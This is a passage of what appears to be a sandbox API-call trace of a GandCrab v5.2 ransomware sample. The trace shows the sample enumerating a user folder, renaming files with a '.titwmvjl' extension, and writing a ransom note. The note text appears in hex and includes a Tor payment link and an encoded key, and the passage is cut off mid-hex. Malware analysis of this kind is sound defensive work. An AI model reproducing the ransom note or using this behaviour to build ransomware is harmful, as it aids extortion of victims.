lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.872] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.872] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.872] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.872] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.873] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a09d2ca4deb61a.lock" [0069.873] lstrlenW (lpString=".titwmvjl") returned 9 [0069.873] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a09d2ca4deb61a.lock") returned 74 [0069.873] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.873] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 83 [0069.873] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\d2ca4a09d2ca4deb61a.lock") returned 74 [0069.873] lstrlenW (lpString=".lock") returned 5 [0069.873] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.873] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.873] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.873] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.874] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.874] lstrcmpW (lpString1="Sonar1.0", lpString2=".") returned 1 [0069.874] lstrcmpW (lpString1="Sonar1.0", lpString2="..") returned 1 [0069.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2="Sonar1.0" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" [0069.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\" [0069.874] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.874] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.875] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.875] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.876] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\\\TITWMVJL-DECRYPT.txt") returned 80 [0069.876] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0069.877] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\